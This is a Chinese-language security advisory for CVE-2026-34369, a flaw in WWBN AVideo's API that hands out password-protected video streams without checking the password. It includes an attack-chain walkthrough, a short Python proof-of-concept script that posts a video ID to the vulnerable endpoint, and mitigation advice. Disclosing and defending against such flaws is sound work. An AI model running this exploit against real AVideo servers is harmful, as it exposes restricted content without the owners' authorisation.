CVE-2026-34369 CVSS 5.3 中危

CVE-2026-34369 AVideo未授权访问漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34369

漏洞类型

访问控制失效

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo是一个开源视频平台。在26.0及以下版本中，其API接口存在权限绕过漏洞。攻击者可在未验证密码的情况下，通过API直接获取受密码保护视频的播放源，导致信息泄露。

技术细节

该漏洞源于API层与Web层在权限校验逻辑上的不一致。AVideo平台在正常播放视频时，会调用`CustomizeUser::getModeYouTube()`钩子函数来验证用户是否输入了正确的视频密码。然而，在提供视频播放源（如MP4直链或HLS清单）的API接口`get_api_video_file`和`get_api_video`中，开发者未复用该鉴权逻辑。攻击者无需经过Web界面的密码输入框，直接构造HTTP请求向上述API端点发送查询，即可绕过密码验证机制。服务器会返回视频的原始流媒体地址，导致本应受限的内容被非授权访问。

攻击链分析

STEP 1

侦察

攻击者识别出目标站点使用的是WWBN AVideo平台，并锁定一个受密码保护的视频ID。

STEP 2

漏洞利用

攻击者绕过Web前端登录界面，直接向`get_api_video_file`或`get_api_video`接口发送包含视频ID的API请求。

STEP 3

权限绕过

服务器端API未执行密码验证，直接处理请求并返回视频的原始播放URL（MP4或HLS）。

STEP 4

数据窃取

攻击者利用返回的URL直接下载或播放受保护的视频内容，造成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url, video_id):
    # The vulnerable endpoint
    url = f"{target_url}/object/get_api_video_file.json"
    
    # Payload data
    data = {
        "videos_id": video_id
    }
    
    try:
        response = requests.post(url, data=data)
        if response.status_code == 200:
            print("[+] Exploit successful!")
            print("[+] Video Source:", response.json())
        else:
            print("[-] Exploit failed.")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    # Replace with actual target and video ID
    exploit("http://localhost", "1")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

建议立即升级AVideo至修复了该漏洞的版本。如果暂时无法升级，应在WAF或反向代理层限制对`object/get_api_video_file`和`object/get_api_video`等敏感API接口的访问，仅允许信任的IP地址调用，或配置严格的身份验证头。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表